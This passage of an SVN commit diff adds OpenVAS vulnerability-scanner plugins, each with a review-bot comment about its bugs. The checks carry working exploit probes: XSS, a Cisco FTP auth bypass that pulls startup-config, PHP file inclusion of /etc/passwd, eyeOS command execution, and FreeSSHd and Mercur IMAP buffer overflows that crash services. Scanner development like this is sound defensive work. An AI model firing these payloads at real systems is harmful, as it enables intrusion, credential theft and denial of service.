+ res = http_get_cache(item:string(dir, "/index.php"), port:port);
+ if (res == NULL) exit(0);
+
+ if (egrep(pattern:">Powered by © <A href=[^>]+>Chipmunk Board<", string:res))
+ {
+ req = http_get(item:string(dir, "/index.php?forumID=", exss), port:port);
+
+ recv = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
+ if(recv == NULL)exit(0);
+
+ if(xss >< recv)
+ {
+ security_note(port);
+ exit(0);
+ }
+ }
+}
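Review bot: `dirs = make_list("/chipmunk");` hard-codes one install path while the `thorough_tests`/`cgi_dirs()` lines just above it are commented out, so a Chipmunk Forum at any other location (including the `/board` and `/forum` defaults the commented code lists) is never tested. Restore those two lines and drop the hard-coded list, matching the directory handling of the other CGI checks in this commit. `get_kb_item("www/", port, "/generic_xss")` passes three separate arguments rather than one key; if `get_kb_item` honours only its first argument the lookup is for the key `www/` and the generic-XSS short-circuit never fires — use `get_kb_item(string("www/", port, "/generic_xss"))`.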
Added: trunk/openvas-plugins/scripts/cisco_ios_ftp_server_auth_bypass.nasl
===================================================================
--- trunk/openvas-plugins/scripts/cisco_ios_ftp_server_auth_bypass.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/cisco_ios_ftp_server_auth_bypass.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,114 @@
+#
+# Script Written By Ferdy Riphagen
+# Script distributed under the GNU GPLv2 License.
+#
+
+desc = "
+Synopsis :
+
+The Cisco IOS FTP server is enabled on the remote system.
+
+Description :
+
+The FTP server does not properly verify authentication, allowing
+for anonymous access to the file system. An attacker could use
+the ftp server to view/download confidential configuration files, or upload
+replacements which will be used at startup.
+
+See also :
+
+http://www.cisco.com/en/US/products/products_security_advisory09186a00808399d0.shtml
+
+Solution :
+
+Disable the FTP Server by using 'no ftp-server enable'
+or upgrade to a newer release (see cisco-sa-20070509-iosftp).
+
+Risk factor :
+
+High / CVSS Base Score : 8.5
+(AV:R/AC:L/Au:NR/C:C/A:P/I:P/B:C)";
+script_description(english:desc);
+
+if (description) {
+ script_id(9999996);
+ script_version("$Revision: 1.0 $");
+ script_cve_id("CVE-2007-2586");
+ script_bugtraq_id(23885);
+
+ name = "Cisco IOS FTP Server Authentication Bypass Vulnerability";
+ script_name(english:name);
+ summary = "Checks for Cisco IOS FTP server authentication bypass";
+ script_summary(english:summary);
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"FTP");
+ script_copyright(english:"This script is Copyright (C) 2007 Ferdy Riphagen");
+
+ script_dependencies("ftp_anonymous.nasl");
+ script_require_ports("Services/FTP", 21);
+ exit(0);
+}
+
+include("ftp_func.inc");
+
+#if (!get_kb_item("ftp/anonymous")) exit(0);
+port = get_kb_item("Services/ftp");
+if (!port) port = 21;
+if (!get_port_state(port)) exit(0);
+
+function start_passive() {
+ pasv = ftp_pasv(socket:soc);
+ if (!pasv) return NULL;
+ soc2 = open_sock_tcp(pasv, transport:get_port_transport(port));
+ if (!soc2) return NULL;
+ return;
+}
+
+banner = get_ftp_banner(port:port);
+if ("IOS-FTP server" >!< banner) exit(0);
+
+# Try to get some directory listing.
+# On the other hand ftp_anonymous.nasl is doing this too :-)
+soc = open_sock_tcp(port);
+if (soc &&
+ (ftp_authenticate(socket:soc, user:"blah", pass:"blah"))) {
+ if (start_passive()) {
+ send(socket:soc, data:'LIST\r\n');
+ recv_listing = ftp_recv_listing(socket:soc2);
+ ftp_close(socket:soc2);
+ }
+}
+if (soc) ftp_close(socket:soc);
+
+# Try to grab the startup-config
+# That's what it's all about..
+if (strlen(recv_listing)) {
+ soc = open_sock_tcp(port);
+ if (soc &&
+ (ftp_authenticate(socket:soc, user:"blah", pass:"blah"))) {
+ send(socket:soc, data:'CWD nvram:\r\n');
+ recv = ftp_recv_line(socket:soc, retry:1);
+ if ("250" >< recv &&
+ (start_passive())) {
+ send(socket:soc, data:'RETR startup-config\r\n');
+ recv_config = ftp_recv_data(socket:soc2, line:500);
+ ftp_close(socket:soc2);
+ }
+ }
+}
+if (soc) ftp_close(socket:soc);
+
+if (strlen(recv_config)) {
+ report = string(
+ desc, "\r\n\r\n",
+ "Plugin output :\r\n\r\n",
+ "Partial startup-config file:\r\n",
+ recv_config);
+ security_hole(port:port, data:report);
+ exit(0);
+}
+else if (strlen(recv_listing)) {
+ security_hole(port:port, data:desc);
+ exit(0);
+}
+
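Review bot: `start_passive()` returns nothing on success (a bare `return;`), so `if (start_passive())` at both call sites is never true and neither the `LIST` nor the `RETR startup-config` step ever runs; as written the check can never report. Return the data socket, `return soc2;`, so the existing truth tests work (`soc2` is still set for the callers as a global). `script_require_ports("Services/FTP", 21)` uses a different case from the `Services/ftp` key read a few lines later; KB keys are case-sensitive, so an IOS FTP server on a non-standard port would be skipped. The partial `startup-config` echoed into the report can contain enable secrets and SNMP community strings, so either say so in the plugin output or trim the excerpt to the first lines that prove access. `script_description(english:desc);` is also called outside `if (description)`, unlike the sibling scripts; move it inside.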
Added: trunk/openvas-plugins/scripts/cisco_vpn_client_priv_escalation.nasl
===================================================================
--- trunk/openvas-plugins/scripts/cisco_vpn_client_priv_escalation.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/cisco_vpn_client_priv_escalation.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,64 @@
+#
+# Script Written By Ferdy Riphagen
+# Script distributed under the GNU GPLv2 License.
+#
+
+if (description) {
+ script_id(25550);
+ script_version("$Revision: 1.2 $");
+
+ script_cve_id("CVE-2006-2679");
+ script_bugtraq_id(18094);
+ script_xref(name:"OSVDB", value:"25888");
+
+ name["english"] = "Cisco VPN Client Privilege Escalation Vulnerability";
+ script_name(english:name["english"]);
+
+ desc = "
+Synopsis :
+
+The remote windows host contains an application that is affected by a
+privilege escalation vulnerability.
+
+Description :
+
+The installed Cisco VPN Client version is prone to a privilege
+escalation attack. By using the 'Start before logon' feature in the
+VPN client dialer, a local attacker may gain privileges and execute
+arbitrary commands with SYSTEM privileges.
+
+See also :
+
+http://www.cisco.com/warp/public/707/cisco-sa-20060524-vpnclient.shtml
+
+Solution:
+
+Upgrade to version 4.8.01.0300 or a later.
+
+Risk factor :
+
+High / CVSS Base Score : 7.0
+(AV:L/AC:L/Au:NR/C:C/I:C/A:C/B:N)";
+ script_description(english:desc);
+ summary = "Detects a privilege escalation in the Cisco VPN Client by query its version number";
+ script_summary(english:summary);
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"Windows");
+ script_copyright(english:"This script is Copyright (C) 2007 Ferdy Riphagen");
+
+ script_dependencies("cisco_vpn_client_detect.nasl");
+ script_require_keys("SMB/CiscoVPNClient/Version");
+ exit(0);
+}
+
+version = get_kb_item("SMB/CiscoVPNClient/Version");
+if (version) {
+ # These versions are reported vulnerable:
+ # - 2.x, 3.x, 4.0.x, 4.6.x, 4.7.x, 4.8.00.x
+ # Not vulnerable:
+ # - 4.7.00.0533
+ if ("4.7.00.0533" >< version) exit(0);
+ if (egrep(pattern:"^([23]\.|4\.([067]\.|8\.00)).+", string:version)) {
+ security_hole(port:get_kb_item("SMB/transport"));
+ }
+}
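Review bot: `script_id(25550)` sits in a numbering range unlike the 200xxx/9999xxx ids given to every other script in this commit, so it looks like an id copied from another feed that may collide with an existing plugin when feeds are mixed; pick an id from the range the sibling scripts use. The report from `security_hole` also omits the version string that matched, which makes a false positive hard to triage; include it, e.g. `security_hole(port:get_kb_item("SMB/transport"), data:string(desc, "\n\nPlugin output :\n\nInstalled version : ", version));`. The regex `^([23]\.|4\.([067]\.|8\.00)).+` is a prefix match, so the `4.7.00.0533` exclusion on the line before it is required for that build; a comment saying the exclusion must stay ahead of the regex would protect the order.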
Added: trunk/openvas-plugins/scripts/docebo_globals_overwrite.nasl
===================================================================
--- trunk/openvas-plugins/scripts/docebo_globals_overwrite.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/docebo_globals_overwrite.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,117 @@
+# Script Written By Ferdy Riphagen
+# <f[dot]riphagen[at]nsec[dot]nl>
+#
+# Script distributed under the GNU GPLv2 License.
+#
+# Original advisory / discovered by :
+# http://milw0rm.com/exploits/1817
+#
+
+desc = "
+Synopsis :
+
+The remote host contains a PHP application that is vulnerable
+to remote and local file inclusions.
+
+Description :
+
+At least one Docebo application is installed on the system.
+
+Docebo has multiple PHP based applications, including a content
+management system (DoceboCMS), a e-learning platform
+(DoceboLMS) and a knowledge maintenance system (DoceboKMS)
+
+By using a flaw in some PHP versions (PHP4 <= 4.4.0 and PHP5 <= 5.0.5)
+it is possible to include files by overwriting the $GLOBALS variable.
+
+This flaw exists if PHP's register_globals is enabled.
+
+See also :
+
+http://secunia.com/advisories/20260/
+http://www.hardened-php.net/advisory_202005.79.html
+
+Solution :
+
+Disable PHP's register_globals and/or upgrade to a newer PHP release.
+
+Risk factor :
+
+Medium / CVSS Base Score : 6
+(AV:R/AC:H/Au:NR/C:P/A:P/I:P/B:N)";
+script_description(english:desc);
+
+if (description) {
+ script_id(200011);
+ script_version("$Revision: 1.0 $");
+
+ script_cve_id("CVE-2006-2576",
+ "CVE-2006-2577");
+ script_bugtraq_id(18109);
+ if (defined_func("script_xref")) {
+ script_xref(name:"OSVDB", value:"25757");
+ }
+
+ name["english"] = "Docebo GLOBALS Variable Overwrite Vulnerability";
+ script_name(english:name["english"]);
+
+ summary["english"] = "Checks for file inclusions errors in multiple Docebo applications";
+ script_summary(english:summary["english"]);
+
+ script_category(ACT_ATTACK);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2006 Ferdy Riphagen");
+
+ script_dependencies("http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+success = 0;
+
+port = get_http_port(default:80);
+if (!get_port_state(port)) exit(0);
+if (!can_host_php(port:port)) exit(0);
+
+if (thorough_tests) dirs = make_list("/doceboLms", "/doceboKms", "/doceboCms", "/doceboCore", cgi_dirs());
+else dirs = make_list(cgi_dirs());
+
+foreach dir (dirs) {
+ req = http_get(item:string(dir, "/index.php"), port:port);
+ res = http_keepalive_send_recv(data:req, port:port, bodyonly:0);
+
+ if (egrep(pattern:"^Set-Cookie:.+docebo_session=", string:res) ||
+ egrep(pattern:'title="Powered by Docebo(KMS|LMS|CMS)"', string:res) ||
+ egrep(pattern:"powered_by.+<a href[^/]+\/\/www\.docebo\.org", string:res)) {
+
+ uri = "/lib/lib.php";
+ globals[0] = "GLOBALS[where_framework]=";
+ globals[1] = "GLOBALS[where_lms]=";
+ lfile = "/etc/passwd";
+
+ for(n = 0; globals[n]; n++) {
+ req = http_get(item:string(dir, uri, "?", globals[n], lfile, "%00"), port:port);
+ recv = http_keepalive_send_recv(data:req, port:port, bodyonly:1);
+
+ if (egrep(pattern:"root:.*:0:[01]:.*:", string:recv)) {
+ n++;
+ success = 1;
+ path += string("http://", get_host_name(), dir, "\n");
+ }
+ }
+ }
+}
+
+if (success) {
+ report = string(desc, "\n\n",
+ "Plugin output :\n\n",
+ "Below the full path to the vulnerable Docebo application(s):\n\n",
+ path);
+ security_warning(port:port, data:report);
+}
+exit(0);
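Review bot: `script_description(english:desc)` sits above `if (description) {` and therefore runs on every scan of the host instead of once at plugin registration; move it inside the block next to `script_name`, which is where phpMyAgenda_30final_file_include.nasl and php_fusion_6_00_206_sql_injection.nasl in this commit put it (mercur_imap_buffer_overflow.nasl and xhp_cms_file_upload.nasl have the same misplacement). The inner `for` loop is terminated by a bare `n++` inside the match branch, which reads like a typo; `break;` states the intent. `path` is built with `+=` without ever being initialised, so `path = "";` next to `success = 0;` would make the report construction explicit.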
Added: trunk/openvas-plugins/scripts/eyeos_command_execution.nasl
===================================================================
--- trunk/openvas-plugins/scripts/eyeos_command_execution.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/eyeos_command_execution.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,96 @@
+#
+# Script Written By Ferdy Riphagen
+# <f[dot]riphagen[at]nsec[dot]nl>
+#
+# Script distributed under the GNU GPLv2 License.
+#
+#
+# Original advisory / discovered by :
+# http://www.gulftech.org/?node=research&article_id=00096-02072006
+#
+
+if (description) {
+ script_id();
+ script_version("$Revision: 1.0 $");
+
+ name["english"] = "EyeOS <= 0.8.9 Command Execution Vulnerability";
+ script_name(english:name["english"]);
+ desc["english"] = "
+Synopsis :
+
+The remote system contains a PHP application that is prone to
+command execution flaws.
+
+Description :
+
+The remote system is running a vulnerable version of eyeOS.
+
+EyeOS is a web based operating system, wich makes it possible
+to access data and applications remote by using a web-browser.
+
+The installed version does not initialize user sessions properly,
+allowing unauthenticated attackers to execute arbitrary commands
+with the privileges of the webserver.
+
+See also :
+
+http://www.gulftech.org/?node=research&article_id=00096-02072006
+
+Solution :
+
+Upgrade to eyeOS version 0.8.10.
+
+Risk factor :
+
+High / CVSS Base Score : 7
+(AV:R/AC:H/Au:NR/C:P/A:C/I:P/B:A)";
+ script_description(english:desc["english"]);
+
+ summary["english"] = "Check if EyeOS is vulnerable to command execution";
+ script_summary(english:summary["english"]);
+
+ script_category(ACT_ATTACK);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2006 Ferdy Riphagen");
+
+ script_dependencie("http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+port = get_http_port(default:80);
+if (!get_port_state(port)) exit(0);
+if (!can_host_php(port:port)) exit(0);
+
+# Check a few directories.
+if (thorough_tests) dirs = make_list("/eyeOS", "/eyeos", cgi_dirs());
+else dirs = make_list(cgi_dirs());
+
+foreach dir (dirs) {
+ # Check if we find eyeOS installed.
+ res = http_get_cache(item:string(dir, "/desktop.php"), port:port);
+ if(res == NULL) exit(0);
+
+ if (egrep(pattern:">Welcome to eyeOS v\. [0-9.]+", string:res)) {
+ url = "eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION[usr]=root&_SESSION[apps][eyeOptions.eyeapp][wrapup]=";
+ cmd = "system(id)";
+
+ # Try to execute a remote command.
+ req = http_get(item:string(dir, "/desktop.php?baccio=", url, cmd, ";"), port:port);
+ debug_print("req: ", req, "\n");
+
+ recv = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
+ if (recv == NULL) exit(0);
+ debug_print("recv: ", recv, "\n");
+
+ if (egrep(pattern:"uid=[0-9]+.*gid=[0-9]+", string:recv)) {
+ security_hole(port);
+ exit(0);
+ }
+ }
+}
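Review bot: `script_id();` is called with no argument, so this plugin has no ID and cannot be registered alongside the others, every one of which passes a numeric value; it needs `script_id(<ID-PLACEHOLDER>);` with an ID chosen from the project's range. Separately, `if(res == NULL) exit(0);` and `if (recv == NULL) exit(0);` inside `foreach dir (dirs)` abandon the whole plugin when one directory yields no response, so the remaining candidate directories are never tested; if the intent is "server went away" a comment should say so, otherwise `continue;` is what the loop wants (phpMyAgenda_30final_file_include.nasl and php_fusion_6_00_206_sql_injection.nasl follow the same pattern).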
Added: trunk/openvas-plugins/scripts/freesshd_key_exchange_overflow.nasl
===================================================================
--- trunk/openvas-plugins/scripts/freesshd_key_exchange_overflow.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/freesshd_key_exchange_overflow.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,96 @@
+#
+# Script Written By Ferdy Riphagen
+# <f[dot]riphagen[at]nsec[dot]nl>
+#
+# Script distributed under the GNU GPLv2 License.
+#
+
+if (description) {
+ script_id(200010);
+ script_version("$Revision: 1.0 $");
+
+ script_cve_id("CVE-2006-2407");
+ script_bugtraq_id(17958);
+
+ name["english"] = "FreeSSHD Key Exchange Buffer Overflow";
+ script_name(english:name["english"]);
+
+desc["english"] = "
+Synopsis :
+
+A vulnerable version of FreeSSHd is installed on
+the remote host.
+
+Description :
+
+The version installed does not validate key exchange strings
+send by a SSH client. This results in a buffer overflow
+and possible a compromise of the host if the client is
+sending a long key exchange string.
+
+See also :
+
+http://secunia.com/advisories/19846
+http://www.freesshd.com/?ctt=download
+
+Solution :
+
+Upgrade to the latest release.
+See second url in the 'See also' section.
+
+Note :
+
+At this point the FreeSSHD Service is reported down.
+You should start it manualy again.
+
+Risk factor :
+
+Critical / CVSS Base Score : 10
+(AV:R/AC:L/Au:NR/C:C/A:C/I:C/B:N)";
+ script_description(english:desc["english"]);
+
+ summary["english"] = "Checks for a buffer overflow in FreeSSHd";
+ script_summary(english:summary["english"]);
+
+ script_category(ACT_DENIAL);
+ script_family(english:"Gain root remotely");
+ script_copyright(english:"This script is Copyright (C) 2006 Ferdy Riphagen");
+
+ script_dependencies("find_service.nes");
+ script_require_ports("Services/ssh", 22);
+ exit(0);
+}
+
+include("misc_func.inc");
+
+port = get_kb_item("Services/ssh");
+if (!port) port = 22;
+
+soc = open_sock_tcp(port);
+if (!soc) exit(0);
+
+banner = recv(socket:soc, length:128);
+if (egrep(pattern:"SSH.+WeOnlyDo", string:banner)) {
+
+ ident = "SSH-2.0-OpenSSH_4.2p1";
+ exp = ident + raw_string(
+ 0x0a, 0x00, 0x00, 0x4f, 0x04, 0x05,
+ 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0xde)
+ + crap(length:20400);
+
+ send(socket:soc, data:exp);
+ recv(socket:soc, length:1024);
+ close(soc);
+
+ soc = open_sock_tcp(port);
+ if (soc) {
+ recv = recv(socket:soc, length:128);
+ close (soc);
+ }
+ if (!soc || (!strlen(recv))) {
+ security_hole(port);
+ }
+}
+exit(0);
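Review bot: `script_id(200010)` is the same ID used by php_fusion_6_00_206_sql_injection.nasl in this commit, and two plugins sharing an ID cannot both be loaded, so one of them needs a distinct value. The verdict also rests on a single reconnect immediately after `close(soc)`: a service that is merely slow to accept the new connection still satisfies `!soc || (!strlen(recv))` and is reported as a hole, so a comment stating that assumption, or a short `sleep()` before `open_sock_tcp(port)`, would reduce false positives.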
Added: trunk/openvas-plugins/scripts/goaheadwebserver_source_disclosure.nasl
===================================================================
--- trunk/openvas-plugins/scripts/goaheadwebserver_source_disclosure.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/goaheadwebserver_source_disclosure.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,114 @@
+#
+# Script Written By Ferdy Riphagen
+#
+# Script distributed under the GNU GPLv2 License.
+#
+
+if (description) {
+ script_id(2000099);
+ script_version("$Revision: 1.0 $");
+
+ script_cve_id("CVE-2002-1603");
+ script_bugtraq_id(9239);
+ if (defined_func("script_xref")) {
+ script_xref(name:"OSVDB", value:"13295");
+ }
+
+ name["english"] = "GoAhead WebServer Script Source Code Disclosure";
+ script_name(english:name["english"]);
+ desc["english"] = "
+Synopsis :
+
+A vulnerable version of GoAhead Webserver is running on the
+remote host.
+
+Description :
+
+GoAhead Webserver is installed on the remote system.
+It's an open-source webserver, which is capable of
+hosting ASP pages, and installation on multiple operating
+systems.
+
+The version installed is vulnerable to Script Source Code
+Disclosure, by adding extra characters to the URL. Possible
+characters are %00, %5C, %2F.
+
+See also :
+
+http://aluigi.altervista.org/adv/goahead-adv3.txt
+http://www.kb.cert.org/vuls/id/975041
+
+Solution :
+
+Upgrade to GoAhead WebServer 2.1.8 or a newer release.
+
+Risk factor :
+
+Medium / CVSS Base Score : 4
+(AV:R/AC:L/Au:NR/C:P/A:N/I:N/B:C)";
+ script_description(english:desc["english"]);
+ summary["english"] = "Checks for script source disclosure in GoAhead Webserver <= 2.1.7";
+ script_summary(english:summary["english"]);
+
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"Web Servers");
+ script_copyright(english:"This script is Copyright (C) 2006 Ferdy Riphagen");
+
+ script_dependencies("http_version.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+function GetFileExt(file) {
+ ret = split(file, sep: '.');
+ return ret;
+}
+
+port = get_http_port(default:80);
+if (!get_port_state(port)) exit(0);
+
+banner = get_http_banner(port:port);
+if ("Server: GoAhead-Webs" >!< banner) exit(0);
+
+# Possible default file which still could be available.
+file[0] = "/treeapp.asp";
+
+# Below options could possible create false-positives.
+if (report_paranoia == 2 && (thorough_tests)) {
+ file[1] = "/default.asp";
+
+ if ("HTTP/1.0 302" && "Location:" >< banner) {
+ redirect = egrep(pattern:"^Location:", string:banner);
+ rfile = ereg_replace(pattern:"Location: http:\/\/+[^/]+", string:redirect, replace:"", icase:1);
+
+ # See if the file is really asp.
+ ret = GetFileExt(file:rfile);
+ if(!isnull(ret)) {
+ if (ereg(pattern:"asp", string:ret[1], icase:1)) {
+ file[2] = chomp(rfile);
+ }
+ }
+ }
+}
+
+for (n = 0; file[n]; n++) {
+ # Server doesn't support keepalives.
+ soc = http_open_socket(port);
+ if (!soc) exit(0);
+
+ req = string("GET ", file[n], "%5C HTTP/1.1\r\n\r\n");
+ send(socket:soc, data:req);
+
+ res = http_recv(socket:soc);
+ http_close_socket(soc);
+
+ if ('<% write(HTTP_AUTHORIZATION); %>' >< res ||
+ ('<%' >< res && ('%>' >< res))) {
+ security_warning(port);
+ exit(0);
+ }
+}
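Review bot: The condition `if ("HTTP/1.0 302" && "Location:" >< banner)` only tests the second operand, because a non-empty string literal on its own is always true; the intended check is `if ("HTTP/1.0 302" >< banner && "Location:" >< banner)`. `GetFileExt` is also the only CamelCase name in the file and returns the whole `split` result rather than the extension its name promises, so either rename it or add `# Returns the '.'-separated parts of file; the caller inspects index 1.` above it.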
Added: trunk/openvas-plugins/scripts/kiwi_cattools_dir_traversal.nasl
===================================================================
--- trunk/openvas-plugins/scripts/kiwi_cattools_dir_traversal.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/kiwi_cattools_dir_traversal.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,66 @@
+#
+# Script Written By Ferdy Riphagen
+# Script distributed under the GNU GPLv2 License.
+#
+
+desc = "
+Synopsis :
+
+The remote tftpd server is affected by a directory traversal vulnerability.
+
+Description :
+
+Kiwi CatTools is installed on the remote host. The version installed is vulnerable
+to a directory traversal attack by using '[char]//..' sequences in the path. A attacker may be able to read and
+write files outside the tftp root.
+
+See also :
+
+http://www.kiwisyslog.com/kb/idx/5/178/article/
+http://marc.theaimsgroup.com/?l=bugtraq&m=117097429127488&w=2
+
+Solution :
+
+Upgrade to Kiwi CatTools version 3.2.9 or later.
+
+Risk factor :
+
+Medium / CVSS Base Score : 6.8
+(AV:R/AC:L/Au:NR/C:C/A:N/I:P/B:C)";
+
+if (description) {
+ script_id(999991);
+ script_version("$Revision: 1.0 $");
+
+ script_cve_id("CVE-2007-0888");
+ script_bugtraq_id(22490);
+
+ name["english"] = "Kiwi CatTools < 3.2.9 Directory Traversal";
+ script_name(english:name["english"]);
+ script_description(english:desc);
+ summary["english"] = "Try to grab a file outside the tftp root";
+ script_summary(english:summary["english"]);
+
+ script_category(ACT_ATTACK);
+ script_family(english:"Remote file access");
+ script_copyright(english:"This script is Copyright (C) 2007 Ferdy Riphagen");
+
+ script_dependencies("tftpd_detect.nasl");
+ script_require_keys("Services/udp/tftp");
+ exit(0);
+}
+
+include("tftp.inc");
+
+port = get_kb_item("Services/udp/tftp");
+if (!port) port = 69;
+
+get = tftp_get(port:port, path:"z//..//..//..//..//..//boot.ini");
+if (isnull(get)) exit(0);
+if (egrep(pattern:"default=multi.*disk.*partition", string:get)) {
+ report = string(
+ desc, "\n\n", "Plugin output :\n\n",
+ "The boot.ini file contains:\n", get);
+ security_warning(port, data:report);
+ exit(0);
+}
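Review bot: `if (!port) port = 69;` can never fire, because `script_require_keys("Services/udp/tftp")` guarantees the key is present before the body runs; either drop the fallback or replace the require_keys with `script_require_ports`, as the other network plugins in this commit do. The match `default=multi.*disk.*partition` only recognises a Windows boot.ini, so a comment such as `# Windows-only probe: boot.ini is the file expected outside the tftp root.` would document why a non-Windows host always comes back clean.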
Added: trunk/openvas-plugins/scripts/mercur_imap_buffer_overflow.nasl
===================================================================
--- trunk/openvas-plugins/scripts/mercur_imap_buffer_overflow.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/mercur_imap_buffer_overflow.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,130 @@
+# Script Written By Ferdy Riphagen
+# <f[dot]riphagen[at]nsec[dot]nl>
+#
+# Script distributed under the GNU GPLv2 License.
+#
+# Original advisory :
+# http://archives.neohapsis.com/archives/fulldisclosure/2006-02/1837.html
+#
+
+desc["english"] = "
+Synopsis :
+
+The Mercur IMAP4 Service is running on the remote host.
+
+Description :
+
+A version of Mercur Mailserver or Messaging Server is installed
+on the remote host. It is a complete messaging solution including
+common functions like 'smtp/pop3/imap4-server'.
+
+The Mercur IMAP4 Service is vulnerable to buffer overflows
+by sending a special crafted 'login' command.
+An attacker can use this to crash the service, possible
+execute arbitrary code and gain some access privileges on the system.
+
+See also :
+
+http://secunia.com/advisories/19267/
+http://www.securityfocus.com/bid/17138
+
+Solution :
+
+Filter access to the IMAP4 Service, so that it can be used
+by trusted sources only.
+
+Risk factor :
+
+High / CVSS Base Score : 8
+(AV:R/AC:L/Au:NR/C:P/A:C/I:P/B:A)";
+script_description(english:desc["english"]);
+
+if (description) {
+ script_id(200050);
+ script_version("$Revision: 1.1 $");
+
+ script_bugtraq_id(17138);
+ script_cve_id("CVE-2006-1255");
+ if (defined_func("script_xref")) {
+ script_xref(name:"OSVDB", value:"23950");
+ }
+
+ name["english"] = "Mercur Mailserver/Messaging version <= 5.0 IMAP Overflow Vulnerability";
+ script_name(english:name["english"]);
+ summary["english"] = "Checks for buffer overflows in Mercur Mailserver/Messaging IMAP Services";
+ script_summary(english:summary["english"]);
+
+ script_category(ACT_MIXED_ATTACK);
+ script_family(english:"Gain a shell remotely");
+ script_copyright(english:"This script is Copyright (C) 2006 Ferdy Riphagen");
+
+ script_dependencies("find_service.nes");
+ script_exclude_keys("imap/false_imap", "imap/overflow");
+ script_require_ports("Services/imap", 143);
+ exit(0);
+}
+
+include("imap_func.inc");
+include("global_settings.inc");
+
+port = get_kb_item("Services/imap");
+if (!port) port = 143;
+if (!get_port_state(port) ||
+ get_kb_item("imap/false_imap") ||
+ get_kb_item("imap/overflow")) exit(0);
+
+if (safe_checks()) {
+ soc = open_sock_tcp(port);
+ if (!soc) exit(0);
+
+ banner = get_imap_banner(port:port);
+ if (banner) debug_print("The remote IMAP4 banner is : ", banner, "\r\n");
+ if (egrep(pattern:".*MERCUR.*IMAP4.Server.*(v(4\.03|5\.00))", string:banner)) {
+
+ report = string(desc["english"], "\n\n",
+ "Note :\n\n",
+ "*** Nessus did only check for this vulnerability,\n",
+ "*** by using the banner of the remote IMAP4 service.\n",
+ "*** This might be a false positive.\n\n");
+
+ security_hole(port:port, data:report);
+ }
+ if (soc) close(soc);
+ exit(0);
+}
+
+else {
+ soc = open_sock_tcp(port);
+ if (!soc) exit(0);
+
+ banner = get_imap_banner(port:port);
+ if (banner) debug_print("The remote IMAP4 banner is: ", banner, "\r\n");
+
+ if (egrep(pattern:"OK.*MERCUR IMAP4.Server", string:banner)) {
+ exp = string("a0 LOGIN ", crap(data:raw_string(0x41), length:300), "\r\n");
+ send(socket:soc, data:exp);
+
+ recv = recv(socket:soc, length:1024);
+ if (recv != NULL) debug_print(level: 2, "Response: ", recv, "\r\n");
+ close(soc);
+
+ soc = open_sock_tcp(port);
+ if (soc) {
+ send(socket:soc, data:string("a1 CAPABILITY \r\n"));
+ recv2 = recv(socket:soc, length:1024);
+ if (recv2 != NULL) debug_print(level: 2, "Response2: ", recv2, "\r\n");
+ }
+ if (!soc || (!strlen(recv2))) {
+
+ report = string(desc["english"], "\n\n",
+ "Note :\n\n",
+ "*** It was possible to crash the MERCUR IMAP4 Service.\n",
+ "*** At this time the remote service does not accepting any new requests.\n",
+ "*** You should check its state, and possble start it manually again.\n\n");
+
+ security_hole(port:port, data:report);
+ }
+ }
+ if (soc) close(soc);
+ exit(0);
+}
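Review bot: In the `safe_checks()` branch the socket from `soc = open_sock_tcp(port);` is never used — `get_imap_banner` obtains the banner on its own — yet a failed open makes the branch `exit(0)` before the banner is even examined and the handle is only released by `if (soc) close(soc);` at the end; those three lines can go. `script_description(english:desc["english"])` above `if (description)` also runs on every scan rather than at registration. The plugin excludes `imap/overflow` at registration but never sets it after it has crashed the service, so later IMAP plugins cannot know the daemon is down; `set_kb_item(name:"imap/overflow", value:TRUE);` before the second `security_hole` would close that gap.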
Added: trunk/openvas-plugins/scripts/phpMyAgenda_30final_file_include.nasl
===================================================================
--- trunk/openvas-plugins/scripts/phpMyAgenda_30final_file_include.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/phpMyAgenda_30final_file_include.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,115 @@
+#
+# Script Written By Ferdy Riphagen
+# <f[dot]riphagen[at]nsec[dot]nl>
+#
+# Script distributed under the GNU GPLv2 License.
+#
+# Original advisory / discovered by :
+# http://www.securityfocus.com/archive/1/431862/30/0/threaded
+#
+
+if (description) {
+ script_id(200002);
